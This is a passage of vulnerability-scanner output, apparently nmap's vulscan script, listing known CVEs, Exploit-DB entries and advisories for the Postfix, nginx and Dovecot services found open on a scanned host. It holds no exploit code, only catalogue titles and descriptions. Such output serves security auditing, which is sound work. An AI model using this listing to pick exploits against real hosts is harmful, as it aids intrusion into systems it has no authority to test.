11335| [67250] Postfix Arbitrary Content Security Bypass Vulnerability
11336| [66455] Postfix Admin 'functions.inc.php' SQL Injection Vulnerability
11337| [65184] Fail2ban Postfix Filter Remote Denial of Service Vulnerability
11338| [51680] Postfix Admin Multiple SQL Injection and Cross Site Scripting Vulnerabilities
11339| [47778] Postfix SMTP Server Cyrus SASL Support Memory Corruption Vulnerability
11340| [36469] Debian and Ubuntu Postfix Insecure Temporary File Creation Vulnerability
11341| [31721] Apple Mac OS X 10.5 Postfix Security Bypass Vulnerability
11342| [30977] Postfix 'epoll' Linux Event Handler Local Denial of Service Vulnerability
11343| [30691] Postfix Local Information Disclosure and Local Privilege Escalation Vulnerabilities
11344| [13133] Salim Gasmi GLD Postfix Greylisting Daemon Format String Vulnerability
11345| [13129] Salim Gasmi GLD Postfix Greylisting Daemon Buffer Overflow Vulnerability
11346| [12445] Postfix IPv6 Unauthorized Mail Relay Vulnerability
11347| [11898] SQLgrey Postfix Greylisting Service Unspecified SQL Injection Vulnerability
11348| [11633] SQLgrey Postfix Greylisting Service SQL Injection Vulnerability
11349| [11323] Apple Mac OS X Postfix Release SMTPD AUTH Username Denial Of Service Vulnerability
11350| [8362] Postfix SMTP Malformed E-mail Envelope Address Denial of Service Vulnerability
11351| [8361] Postfix Connection Proxying Vulnerability
11352| [8333] Multiple Postfix Denial of Service Vulnerabilities
11353| [3638] SuSEConfig.postfix chroot Local DoS Attack Vulnerability
11354| [3637] SuSEConfig.postfix chroot File Ownership Vulnerability
11355| [3544] Postfix SMTP Log Denial Of Service Vulnerability
11356| [1428] cyrus With postfix and Procmail Remote Shell Expansion Vulnerabilities
11357|
11358| IBM X-Force - https://exchange.xforce.ibmcloud.com:
11359| [72752] Postfix Admin multiple parameters SQL injection
11360| [72751] PostfixAdmin multiple parameters cross-site scripting
11361| [67359] Postfix Cyrus SASL library in the SMTP server code execution
11362| [55970] SUSE Linux Enterprise postfix security bypass
11363| [53425] Postfix in Debian and Ubuntu pid symlink
11364| [45876] Apple Mac OS X Postfix configuration file weak security
11365| [44865] Postfix file descriptor denial of service
11366| [44461] Postfix email information disclosure
11367| [44460] Postfix symlink code execution
11368| [22655] RHSA-2005:152 updates for postfix not installed
11369| [19218] Postfix IPv6 mail relay
11370| [18435] SQLgrey Postfix greylisting service SQL injection
11371| [18353] Postfix CRAM-MD5 authentication replay attack
11372| [17998] SQLgrey Postfix greylisting service SQL injection
11373| [17595] Apple Mac OS postfix SMTPD AUTH denial of service
11374| [12816] Postfix MAIL FROM or RCPT TO denial of service
11375| [12815] Postfix could be used as a distributed denial of service tool
11376| [7568] Postfix SMTP log denial of service
11377| [4905] Cyrus with postfix and procmail integration could allow remote command execution
11378|
11379| Exploit-DB - https://www.exploit-db.com:
11380| [25392] Salim Gasmi GLD 1.x Postfix Greylisting Daemon Buffer Overflow Vulnerability
11381| [22982] Postfix 1.1.x Denial of Service Vulnerabilities (2)
11382| [22981] Postfix 1.1.x Denial of Service Vulnerabilities (1)
11383| [16841] GLD (Greylisting Daemon) Postfix Buffer Overflow
11384| [10023] Salim Gasmi GLD 1.0 - 1.4 Postfix Greylisting Buffer Overflow
11385| [6472] Postfix < 2.4.9, 2.5.5, 2.6-20080902 - (.forward) Local DoS Exploit
11386| [6337] Postfix <= 2.6-20080814 - (symlink) Local Privilege Escalation Exploit
11387| [934] gld 1.4 (Postfix Greylisting Daemon) Remote Format String Exploit
11388|
11389| OpenVAS (Nessus) - http://www.openvas.org:
11390| [902517] Postfix SMTP Server Cyrus SASL Support Memory Corruption Vulnerability
11391| [881389] CentOS Update for postfix CESA-2011:0422 centos5 x86_64
11392| [881293] CentOS Update for postfix CESA-2011:0843 centos4 x86_64
11393| [881278] CentOS Update for postfix CESA-2011:0422 centos4 x86_64
11394| [881267] CentOS Update for postfix CESA-2011:0843 centos5 x86_64
11395| [880520] CentOS Update for postfix CESA-2011:0422 centos5 i386
11396| [880509] CentOS Update for postfix CESA-2011:0843 centos5 i386
11397| [880488] CentOS Update for postfix CESA-2011:0843 centos4 i386
11398| [880485] CentOS Update for postfix CESA-2011:0422 centos4 i386
11399| [880268] CentOS Update for postfix CESA-2008:0839 centos3 i386
11400| [880023] CentOS Update for postfix CESA-2008:0839 centos3 x86_64
11401| [870658] RedHat Update for postfix RHSA-2011:0423-01
11402| [870440] RedHat Update for postfix RHSA-2011:0843-01
11403| [870418] RedHat Update for postfix RHSA-2011:0422-01
11404| [870021] RedHat Update for postfix RHSA-2008:0839-01
11405| [863100] Fedora Update for postfix FEDORA-2011-6777
11406| [863097] Fedora Update for postfix FEDORA-2011-6771
11407| [862950] Fedora Update for postfix FEDORA-2011-3394
11408| [862938] Fedora Update for postfix FEDORA-2011-3355
11409| [860510] Fedora Update for postfix FEDORA-2008-8593
11410| [860419] Fedora Update for postfix FEDORA-2008-8595
11411| [850126] SuSE Update for postfix SUSE-SA:2010:011
11412| [850031] SuSE Update for postfix SUSE-SA:2008:040
11413| [840658] Ubuntu Update for postfix USN-1131-1
11414| [840648] Ubuntu Update for postfix USN-1113-1
11415| [840227] Ubuntu Update for postfix vulnerabilities USN-642-1
11416| [840190] Ubuntu Update for postfix vulnerability USN-636-1
11417| [831400] Mandriva Update for postfix MDVSA-2011:090 (postfix)
11418| [830713] Mandriva Update for postfix MDVSA-2008:171 (postfix)
11419| [830635] Mandriva Update for postfix MDVSA-2008:190 (postfix)
11420| [830075] Mandriva Update for postfix MDKA-2007:079 (postfix)
11421| [72452] Gentoo Security Advisory GLSA 201209-18 (postfixadmin)
11422| [71559] Gentoo Security Advisory GLSA 201206-33 (Postfix)
11423| [70744] FreeBSD Ports: postfixadmin
11424| [69770] FreeBSD Ports: postfix, postfix-base
11425| [69733] Debian Security Advisory DSA 2233-1 (postfix)
11426| [69363] FreeBSD Ports: postfix, postfix-base
11427| [66394] Mandriva Security Advisory MDVSA-2009:224-1 (postfix)
11428| [65957] SLES10: Security update for Postfix
11429| [65911] SLES10: Security update for Postfix
11430| [65353] SLES9: Security update for Postfix
11431| [65350] SLES9: Security update for postfix
11432| [64696] Mandrake Security Advisory MDVSA-2009:224 (postfix)
11433| [61646] Gentoo Security Advisory GLSA 200809-09 (postfix)
11434| [61445] Gentoo Security Advisory GLSA 200808-12 (postfix)
11435| [61435] Debian Security Advisory DSA 1629-2 (postfix)
11436| [61434] Debian Security Advisory DSA 1629-1 (postfix)
11437| [60836] FreeBSD Ports: postfix-policyd-weight
11438| [58580] Debian Security Advisory DSA 1361-1 (postfix-policyd)
11439| [53833] Debian Security Advisory DSA 093-1 (postfix)
11440| [53652] Debian Security Advisory DSA 363-1 (postfix)
11441|
11442| SecurityTracker - https://www.securitytracker.com:
11443| [1025521] Postfix SASL Authentication Heap Overflow Lets Remote Users Deny Service
11444| [1025179] Postfix Plaintext to TLS Switching Error Lets Remote Users Inject Plaintext Commands
11445| [1020800] Postfix Linux epoll File Descriptor Leak Lets Local Users Deny Service
11446| [1020700] Postfix Symlink Dereference Bug Lets Local Users Gain Elevated Privileges
11447| [1012395] Postfix CRAM-MD5 Replay Attack May Let Remote Users Send Mail
11448| [1011532] Postfix Buffer Error May Prevent Remote Users from Being Able to Authenticate Using SMTPD AUTH
11449| [1007382] Postfix Bounce Messages Let Remote Users Scan for Open Ports on Other Hosts
11450| [1007381] Postfix Address Resolver Parsing Bug Lets Remote Users Hang the System
11451| [1002756] Postfix Mail Server Can Be Crashed By Remote Users Initiating Unsuccessful Sessions
11452|
11453| OSVDB - http://www.osvdb.org:
11454| [94034] Linux Kernel Broadcom B43 Wireless Driver b43_request_firmware Function fwpostfix modprobe Parameter Format String Local Privilege Escalation
11455| [78567] Postfix Admin backup.php Unspecified SQL Injection
11456| [78566] Postfix Admin functions.inc.php pacrypt() Function Unspecified SQL Injection
11457| [78565] Postfix Admin create-domain.php Unspecified SQL Injection
11458| [78564] Postfix Admin Unspecified XSS
11459| [78563] Postfix Admin edit-alias.php Unspecified XSS
11460| [78562] Postfix Admin create-alias.php Unspecified XSS
11461| [78561] Postfix Admin create-domain.php Unspecified XSS
11462| [78560] Postfix Admin templates/edit-vacation.php domain Parameter XSS
11463| [78559] Postfix Admin templates/menu.php domain Parameter XSS
11464| [72259] Postfix SMTP Cyrus SASL Authentication Context Data Reuse Memory Corruption
11465| [71021] Postfix STARTTLS Arbitrary Plaintext Command Injection
11466| [68340] Artica postfix.events.php Unrestricted Access Information Disclosure
11467| [61983] SUSE Linux postfix Network Interface Remote Access Restriction Bypass
11468| [58325] Debian GNU/Linux postfix postfix.postinst Symlink Arbitrary File Overwrite
11469| [49634] Postfix postfix_groups.pl Multiple Temporary File Symlink Arbitrary File Overwrite
11470| [48973] Apple Mac OS X Postfix Network Access Configuration Weakness
11471| [48108] Postfix epoll File Descriptor Leak Local DoS
11472| [47659] Postfix Cross-user Filename Local Mail Interception
11473| [47658] Postfix Hardlink to Symlink Mailspool Arbitrary Content Append
11474| [43888] policyd-weight for Postfix Socket Handling Unspecified Arbitrary File Manipulation
11475| [38091] policyd for Postfix sockets.c read_w() Function SMTP Command Remote Overflow
11476| [22381] Kolab Server Secure SMTP postfix.log Authentication Credential Disclosure
11477| [13470] Postfix IPv6 Patch if_inet6 Failure Arbitrary Mail Relay
11478| [12339] SQLgrey Postfix greylisting service Unspecified SQL Injection
11479| [12200] Apple Mac OS X Postfix CRAM-MD5 Replay Credentials
11480| [11571] SQLgrey Postfix greylisting Email Address SQL Injection
11481| [10545] Postfix Multiple Mail Header SMTP listener DoS
11482| [10544] Postfix Malformed Envelope Address nqmgr DoS
11483| [10500] Apple Mac OS X Postfix SMTPD AUTH Username Overflow DoS
11484| [6551] Postfix Bounce Scan / Packet Amplification DDoS
11485| [1991] Postfix SMTP Log DoS
11486|_
1148753/tcp open domain (unknown banner: none)
11488| fingerprint-strings:
11489| DNSVersionBindReqTCP:
11490| version
11491| bind
11492|_ none
1149380/tcp open http nginx
11494| vulscan: VulDB - https://vuldb.com:
11495| [133852] Sangfor Sundray WLAN Controller up to 3.7.4.2 Cookie Header nginx_webconsole.php Code Execution
11496| [132132] SoftNAS Cloud 4.2.0/4.2.1 Nginx privilege escalation
11497| [131858] Puppet Discovery up to 1.3.x Nginx Container weak authentication
11498| [130644] Nginx Unit up to 1.7.0 Router Process Request Heap-based memory corruption
11499| [127759] VeryNginx 0.3.3 Web Application Firewall privilege escalation
11500| [126525] nginx up to 1.14.0/1.15.5 ngx_http_mp4_module Loop denial of service
11501| [126524] nginx up to 1.14.0/1.15.5 HTTP2 CPU Exhaustion denial of service
11502| [126523] nginx up to 1.14.0/1.15.5 HTTP2 Memory Consumption denial of service
11503| [119845] Pivotal Operations Manager up to 2.0.13/2.1.5 Nginx privilege escalation
11504| [114368] SuSE Portus 2.3 Nginx Certificate weak authentication
11505| [103517] nginx up to 1.13.2 Range Filter Request Integer Overflow memory corruption
11506| [89849] nginx RFC 3875 Namespace Conflict Environment Variable Open Redirect
11507| [87719] nginx up to 1.11.0 ngx_files.c ngx_chain_to_iovec denial of service
11508| [80760] nginx 0.6.18/1.9.9 DNS CNAME Record Crash denial of service
11509| [80759] nginx 0.6.18/1.9.9 DNS CNAME Record Use-After-Free denial of service
11510| [80758] nginx 0.6.18/1.9.9 DNS UDP Packet Crash denial of service
11511| [67677] nginx up to 1.7.3 SSL weak authentication
11512| [67296] nginx up to 1.7.3 SMTP Proxy ngx_mail_smtp_starttls privilege escalation
11513| [12822] nginx up to 1.5.11 SPDY SPDY Request Heap-based memory corruption
11514| [12824] nginx 1.5.10 on 32-bit SPDY memory corruption
11515| [11237] nginx up to 1.5.6 URI String Bypass privilege escalation
11516| [65364] nginx up to 1.1.13 Default Configuration information disclosure
11517| [8671] nginx up to 1.4 proxy_pass denial of service
11518| [8618] nginx 1.3.9/1.4.0 http/ngx_http_parse.c ngx_http_parse_chunked() memory corruption
11519| [7247] nginx 1.2.6 Proxy Function spoofing
11520| [61434] nginx 1.2.0/1.3.0 on Windows Access Restriction privilege escalation
11521| [5293] nginx up to 1.1.18 ngx_http_mp4_module MP4 File memory corruption
11522| [4843] nginx up to 1.0.13/1.1.16 HTTP Header Response Parser ngx_http_parse.c information disclosure
11523| [59645] nginx up to 0.8.9 Heap-based memory corruption
11524| [53592] nginx 0.8.36 memory corruption
11525| [53590] nginx up to 0.8.9 unknown vulnerability
11526| [51533] nginx 0.7.64 Terminal privilege escalation
11527| [50905] nginx up to 0.8.9 directory traversal
11528| [50903] nginx up to 0.8.10 NULL Pointer Dereference denial of service
11529| [50043] nginx up to 0.8.10 memory corruption
11530|
11531| MITRE CVE - https://cve.mitre.org:
11532| [CVE-2013-2070] http/modules/ngx_http_proxy_module.c in nginx 1.1.4 through 1.2.8 and 1.3.0 through 1.4.0, when proxy_pass is used with untrusted HTTP servers, allows remote attackers to cause a denial of service (crash) and obtain sensitive information from worker process memory via a crafted proxy response, a similar vulnerability to CVE-2013-2028.
11533| [CVE-2013-2028] The ngx_http_parse_chunked function in http/ngx_http_parse.c in nginx 1.3.9 through 1.4.0 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a chunked Transfer-Encoding request with a large chunk size, which triggers an integer signedness error and a stack-based buffer overflow.
11534| [CVE-2012-3380] Directory traversal vulnerability in naxsi-ui/nx_extract.py in the Naxsi module before 0.46-1 for Nginx allows local users to read arbitrary files via unspecified vectors.
11535| [CVE-2012-2089] Buffer overflow in ngx_http_mp4_module.c in the ngx_http_mp4_module module in nginx 1.0.7 through 1.0.14 and 1.1.3 through 1.1.18, when the mp4 directive is used, allows remote attackers to cause a denial of service (memory overwrite) or possibly execute arbitrary code via a crafted MP4 file.
11536| [CVE-2012-1180] Use-after-free vulnerability in nginx before 1.0.14 and 1.1.x before 1.1.17 allows remote HTTP servers to obtain sensitive information from process memory via a crafted backend response, in conjunction with a client request.
11537| [CVE-2011-4963] nginx/Windows 1.3.x before 1.3.1 and 1.2.x before 1.2.1 allows remote attackers to bypass intended access restrictions and access restricted files via (1) a trailing . (dot) or (2) certain "$index_allocation" sequences in a request.
11538| [CVE-2011-4315] Heap-based buffer overflow in compression-pointer processing in core/ngx_resolver.c in nginx before 1.0.10 allows remote resolvers to cause a denial of service (daemon crash) or possibly have unspecified other impact via a long response.
11539| [CVE-2010-2266] nginx 0.8.36 allows remote attackers to cause a denial of service (crash) via certain encoded directory traversal sequences that trigger memory corruption, as demonstrated using the "%c0.%c0." sequence.
11540| [CVE-2010-2263] nginx 0.8 before 0.8.40 and 0.7 before 0.7.66, when running on Windows, allows remote attackers to obtain source code or unparsed content of arbitrary files under the web document root by appending ::$DATA to the URI.
11541| [CVE-2009-4487] nginx 0.7.64 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to modify a window's title, or possibly execute arbitrary commands or overwrite files, via an HTTP request containing an escape sequence for a terminal emulator.
11542| [CVE-2009-3898] Directory traversal vulnerability in src/http/modules/ngx_http_dav_module.c in nginx (aka Engine X) before 0.7.63, and 0.8.x before 0.8.17, allows remote authenticated users to create or overwrite arbitrary files via a .. (dot dot) in the Destination HTTP header for the WebDAV (1) COPY or (2) MOVE method.
11543| [CVE-2009-3896] src/http/ngx_http_parse.c in nginx (aka Engine X) 0.1.0 through 0.4.14, 0.5.x before 0.5.38, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.14 allows remote attackers to cause a denial of service (NULL pointer dereference and worker process crash) via a long URI.
11544| [CVE-2009-2629] Buffer underflow in src/http/ngx_http_parse.c in nginx 0.1.0 through 0.5.37, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.15 allows remote attackers to execute arbitrary code via crafted HTTP requests.
11545|
11546| SecurityFocus - https://www.securityfocus.com/bid/:
11547| [99534] Nginx CVE-2017-7529 Remote Integer Overflow Vulnerability
11548| [93903] Nginx CVE-2016-1247 Remote Privilege Escalation Vulnerability
11549| [91819] Nginx CVE-2016-1000105 Security Bypass Vulnerability
11550| [90967] nginx CVE-2016-4450 Denial of Service Vulnerability
11551| [82230] nginx Multiple Denial of Service Vulnerabilities
11552| [78928] Nginx CVE-2010-2266 Denial-Of-Service Vulnerability
11553| [70025] nginx CVE-2014-3616 SSL Session Fixation Vulnerability
11554| [69111] nginx SMTP Proxy Remote Command Injection Vulnerability
11555| [67507] nginx SPDY Implementation CVE-2014-0088 Arbitrary Code Execution Vulnerability
11556| [66537] nginx SPDY Implementation Heap Based Buffer Overflow Vulnerability
11557| [63814] nginx CVE-2013-4547 URI Processing Security Bypass Vulnerability
11558| [59824] Nginx CVE-2013-2070 Remote Security Vulnerability
11559| [59699] nginx 'ngx_http_parse.c' Stack Buffer Overflow Vulnerability
11560| [59496] nginx 'ngx_http_close_connection()' Remote Integer Overflow Vulnerability
11561| [59323] nginx NULL-Byte Arbitrary Code Execution Vulnerability
11562| [58105] Nginx 'access.log' Insecure File Permissions Vulnerability
11563| [57139] nginx CVE-2011-4968 Man in The Middle Vulnerability
11564| [55920] nginx CVE-2011-4963 Security Bypass Vulnerability
11565| [54331] Nginx Naxsi Module 'nx_extract.py' Script Remote File Disclosure Vulnerability
11566| [52999] nginx 'ngx_http_mp4_module.c' Buffer Overflow Vulnerability
11567| [52578] nginx 'ngx_cpystrn()' Information Disclosure Vulnerability
11568| [50710] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability
11569| [40760] nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities
11570| [40434] nginx Space String Remote Source Code Disclosure Vulnerability
11571| [40420] nginx Directory Traversal Vulnerability
11572| [37711] nginx Terminal Escape Sequence in Logs Command Injection Vulnerability
11573| [36839] nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability
11574| [36490] nginx WebDAV Multiple Directory Traversal Vulnerabilities
11575| [36438] nginx Proxy DNS Cache Domain Spoofing Vulnerability
11576| [36384] nginx HTTP Request Remote Buffer Overflow Vulnerability
11577|
11578| IBM X-Force - https://exchange.xforce.ibmcloud.com:
11579| [84623] Phusion Passenger gem for Ruby with nginx configuration insecure permissions
11580| [84172] nginx denial of service
11581| [84048] nginx buffer overflow
11582| [83923] nginx ngx_http_close_connection() integer overflow
11583| [83688] nginx null byte code execution
11584| [83103] Naxsi module for Nginx naxsi_unescape_uri() function security bypass
11585| [82319] nginx access.log information disclosure
11586| [80952] nginx SSL spoofing
11587| [77244] nginx and Microsoft Windows request security bypass
11588| [76778] Naxsi module for Nginx nx_extract.py directory traversal
11589| [74831] nginx ngx_http_mp4_module.c buffer overflow
11590| [74191] nginx ngx_cpystrn() information disclosure
11591| [74045] nginx header response information disclosure
11592| [71355] nginx ngx_resolver_copy() buffer overflow
11593| [59370] nginx characters denial of service
11594| [59369] nginx DATA source code disclosure
11595| [59047] nginx space source code disclosure
11596| [58966] nginx unspecified directory traversal
11597| [54025] nginx ngx_http_parse.c denial of service
11598| [53431] nginx WebDAV component directory traversal
11599| [53328] Nginx CRC-32 cached domain name spoofing
11600| [53250] Nginx ngx_http_parse_complex_uri() function code execution
11601|
11602| Exploit-DB - https://www.exploit-db.com:
11603| [26737] nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit
11604| [25775] Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow
11605| [25499] nginx 1.3.9-1.4.0 DoS PoC
11606| [24967] nginx 0.6.x Arbitrary Code Execution NullByte Injection
11607| [14830] nginx 0.6.38 - Heap Corruption Exploit
11608| [13822] Nginx <= 0.7.65 / 0.8.39 (dev) Source Disclosure / Download Vulnerability
11609| [13818] Nginx 0.8.36 Source Disclosure and DoS Vulnerabilities
11610| [12804] nginx [engine x] http server <= 0.6.36 Path Draversal
11611| [9901] nginx 0.7.0-0.7.61, 0.6.0-0.6.38, 0.5.0-0.5.37, 0.4.0-0.4.14 PoC
11612| [9829] nginx 0.7.61 WebDAV directory traversal
11613|
11614| OpenVAS (Nessus) - http://www.openvas.org:
11615| [864418] Fedora Update for nginx FEDORA-2012-3846
11616| [864310] Fedora Update for nginx FEDORA-2012-6238
11617| [864209] Fedora Update for nginx FEDORA-2012-6411
11618| [864204] Fedora Update for nginx FEDORA-2012-6371
11619| [864121] Fedora Update for nginx FEDORA-2012-4006
11620| [864115] Fedora Update for nginx FEDORA-2012-3991
11621| [864065] Fedora Update for nginx FEDORA-2011-16075
11622| [863654] Fedora Update for nginx FEDORA-2011-16110
11623| [861232] Fedora Update for nginx FEDORA-2007-1158
11624| [850180] SuSE Update for nginx openSUSE-SU-2012:0237-1 (nginx)
11625| [831680] Mandriva Update for nginx MDVSA-2012:043 (nginx)
11626| [802045] 64-bit Debian Linux Rootkit with nginx Doing iFrame Injection
11627| [801636] nginx HTTP Request Remote Buffer Overflow Vulnerability
11628| [103470] nginx 'ngx_http_mp4_module.c' Buffer Overflow Vulnerability
11629| [103469] nginx 'ngx_cpystrn()' Information Disclosure Vulnerability
11630| [103344] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability
11631| [100676] nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities
11632| [100659] nginx Directory Traversal Vulnerability
11633| [100658] nginx Space String Remote Source Code Disclosure Vulnerability
11634| [100441] nginx Terminal Escape Sequence in Logs Command Injection Vulnerability
11635| [100321] nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability
11636| [100277] nginx Proxy DNS Cache Domain Spoofing Vulnerability
11637| [100276] nginx HTTP Request Remote Buffer Overflow Vulnerability
11638| [100275] nginx WebDAV Multiple Directory Traversal Vulnerabilities
11639| [71574] Gentoo Security Advisory GLSA 201206-07 (nginx)
11640| [71308] Gentoo Security Advisory GLSA 201203-22 (nginx)
11641| [71297] FreeBSD Ports: nginx
11642| [71276] FreeBSD Ports: nginx
11643| [71239] Debian Security Advisory DSA 2434-1 (nginx)
11644| [66451] Fedora Core 11 FEDORA-2009-12782 (nginx)
11645| [66450] Fedora Core 10 FEDORA-2009-12775 (nginx)
11646| [66449] Fedora Core 12 FEDORA-2009-12750 (nginx)
11647| [64924] Gentoo Security Advisory GLSA 200909-18 (nginx)
11648| [64912] Fedora Core 10 FEDORA-2009-9652 (nginx)
11649| [64911] Fedora Core 11 FEDORA-2009-9630 (nginx)
11650| [64894] FreeBSD Ports: nginx
11651| [64869] Debian Security Advisory DSA 1884-1 (nginx)
11652|
11653| SecurityTracker - https://www.securitytracker.com:
11654| [1028544] nginx Bug Lets Remote Users Deny Service or Obtain Potentially Sensitive Information
11655| [1028519] nginx Stack Overflow Lets Remote Users Execute Arbitrary Code
11656| [1026924] nginx Buffer Overflow in ngx_http_mp4_module Lets Remote Users Execute Arbitrary Code
11657| [1026827] nginx HTTP Response Processing Lets Remote Users Obtain Portions of Memory Contents
11658|
11659| OSVDB - http://www.osvdb.org:
11660| [94864] cPnginx Plugin for cPanel nginx Configuration Manipulation Arbitrary File Access
11661| [93282] nginx proxy_pass Crafted Upstream Proxied Server Response Handling Worker Process Memory Disclosure
11662| [93037] nginx /http/ngx_http_parse.c Worker Process Crafted Request Handling Remote Overflow
11663| [92796] nginx ngx_http_close_connection Function Crafted r->
11664| [92634] nginx ngx_http_request.h zero_in_uri URL Null Byte Handling Remote Code Execution
11665| [90518] nginx Log Directory Permission Weakness Local Information Disclosure
11666| [88910] nginx Proxy Functionality SSL Certificate Validation MitM Spoofing Weakness
11667| [84339] nginx/Windows Multiple Request Sequence Parsing Arbitrary File Access
11668| [83617] Naxsi Module for Nginx naxsi-ui/ nx_extract.py Traversal Arbitrary File Access
11669| [81339] nginx ngx_http_mp4_module Module Atom MP4 File Handling Remote Overflow
11670| [80124] nginx HTTP Header Response Parsing Freed Memory Information Disclosure
11671| [77184] nginx ngx_resolver.c ngx_resolver_copy() Function DNS Response Parsing Remote Overflow
11672| [65531] nginx on Windows URI ::$DATA Append Arbitrary File Access
11673| [65530] nginx Encoded Traversal Sequence Memory Corruption Remote DoS
11674| [65294] nginx on Windows Encoded Space Request Remote Source Disclosure
11675| [63136] nginx on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass
11676| [62617] nginx Internal DNS Cache Poisoning Weakness
11677| [61779] nginx HTTP Request Escape Sequence Terminal Command Injection
11678| [59278] nginx src/http/ngx_http_parse.c ngx_http_process_request_headers() Function URL Handling NULL Dereference DoS
11679| [58328] nginx WebDAV Multiple Method Traversal Arbitrary File Write
11680| [58128] nginx ngx_http_parse_complex_uri() Function Underflow
11681| [44447] nginx (engine x) msie_refresh Directive Unspecified XSS
11682| [44446] nginx (engine x) ssl_verify_client Directive HTTP/0.9 Protocol Bypass
11683| [44445] nginx (engine x) ngx_http_realip_module satisfy_any Directive Unspecified Access Bypass
11684| [44444] nginx (engine x) X-Accel-Redirect Header Unspecified Traversal
11685| [44443] nginx (engine x) rtsig Method Signal Queue Overflow
11686| [44442] nginx (engine x) Worker Process Millisecond Timers Unspecified Overflow
11687|_
11688110/tcp open pop3 Dovecot pop3d
11689| vulscan: VulDB - https://vuldb.com:
11690| [139289] cPanel up to 68.0.14 dovecot-xaps-plugin Format privilege escalation
11691| [134480] Dovecot up to 2.3.5.2 Submission-Login Crash denial of service
11692| [134479] Dovecot up to 2.3.5.2 IMAP Server Crash denial of service
11693| [134024] Dovecot up to 2.3.5.1 JSON Encoder Username Crash denial of service
11694| [132543] Dovecot up to 2.2.36.0/2.3.4.0 Certificate Impersonation weak authentication
11695| [119762] Dovecot up to 2.2.28 dict Authentication var_expand() denial of service
11696| [114012] Dovecot up to 2.2.33 TLS SNI Restart denial of service
11697| [114009] Dovecot SMTP Delivery Email Message Out-of-Bounds memory corruption
11698| [112447] Dovecot up to 2.2.33/2.3.0 SASL Auth Memory Leak denial of service
11699| [106837] Dovecot up to 2.2.16 ssl-proxy-openssl.c ssl-proxy-opensslc denial of service
11700| [97052] Dovecot up to 2.2.26 auth-policy Unset Crash denial of service
11701| [69835] Dovecot 2.2.0/2.2.1 denial of service
11702| [13348] Dovecot up to 1.2.15/2.1.15 IMAP4/POP3 SSL/TLS Handshake denial of service
11703| [65684] Dovecot up to 2.2.6 unknown vulnerability
11704| [9807] Dovecot up to 1.2.7 on Exim Input Sanitizer privilege escalation
11705| [63692] Dovecot up to 2.0.15 spoofing
11706| [7062] Dovecot 2.1.10 mail-search.c denial of service
11707| [57517] Dovecot up to 2.0.12 Login directory traversal
11708| [57516] Dovecot up to 2.0.12 Access Restriction directory traversal
11709| [57515] Dovecot up to 2.0.12 Crash denial of service
11710| [54944] Dovecot up to 1.2.14 denial of service
11711| [54943] Dovecot up to 1.2.14 Access Restriction Symlink privilege escalation
11712| [54942] Dovecot up to 2.0.4 Access Restriction denial of service
11713| [54941] Dovecot up to 2.0.4 Access Restriction unknown vulnerability
11714| [54840] Dovecot up to 1.2.12 AGate unknown vulnerability
11715| [53277] Dovecot up to 1.2.10 denial of service
11716| [50082] Dovecot up to 1.1.6 Stack-based memory corruption
11717| [45256] Dovecot up to 1.1.5 directory traversal
11718| [44846] Dovecot 1.1.4/1.1.5 IMAP Client Crash denial of service
11719| [44546] Dovecot up to 1.0.x Access Restriction unknown vulnerability
11720| [44545] Dovecot up to 1.0.x Access Restriction unknown vulnerability
11721| [41430] Dovecot 1.0.12/1.1 Locking unknown vulnerability
11722| [40356] Dovecot 1.0.9 Cache unknown vulnerability
11723| [38222] Dovecot 1.0.2 directory traversal
11724| [36376] Dovecot up to 1.0.x directory traversal
11725| [33332] Timo Sirainen Dovecot up to 1.0test53 Off-By-One memory corruption
11726|
11727| MITRE CVE - https://cve.mitre.org:
11728| [CVE-2011-4318] Dovecot 2.0.x before 2.0.16, when ssl or starttls is enabled and hostname is used to define the proxy destination, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a valid certificate for a different hostname.
11729| [CVE-2011-2167] script-login in Dovecot 2.0.x before 2.0.13 does not follow the chroot configuration setting, which might allow remote authenticated users to conduct directory traversal attacks by leveraging a script.
11730| [CVE-2011-2166] script-login in Dovecot 2.0.x before 2.0.13 does not follow the user and group configuration settings, which might allow remote authenticated users to bypass intended access restrictions by leveraging a script.
11731| [CVE-2011-1929] lib-mail/message-header-parser.c in Dovecot 1.2.x before 1.2.17 and 2.0.x before 2.0.13 does not properly handle '\0' characters in header names, which allows remote attackers to cause a denial of service (daemon crash or mailbox corruption) via a crafted e-mail message.
11732| [CVE-2010-4011] Dovecot in Apple Mac OS X 10.6.5 10H574 does not properly manage memory for user names, which allows remote authenticated users to read the private e-mail of other persons in opportunistic circumstances via standard e-mail clients accessing a user's own mailbox, related to a "memory aliasing issue."
11733| [CVE-2010-3780] Dovecot 1.2.x before 1.2.15 allows remote authenticated users to cause a denial of service (master process outage) by simultaneously disconnecting many (1) IMAP or (2) POP3 sessions.
11734| [CVE-2010-3779] Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.beta2 grants the admin permission to the owner of each mailbox in a non-public namespace, which might allow remote authenticated users to bypass intended access restrictions by changing the ACL of a mailbox, as demonstrated by a symlinked shared mailbox.
11735| [CVE-2010-3707] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving more specific entries that occur after less specific entries, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
11736| [CVE-2010-3706] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving the private namespace of a user, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
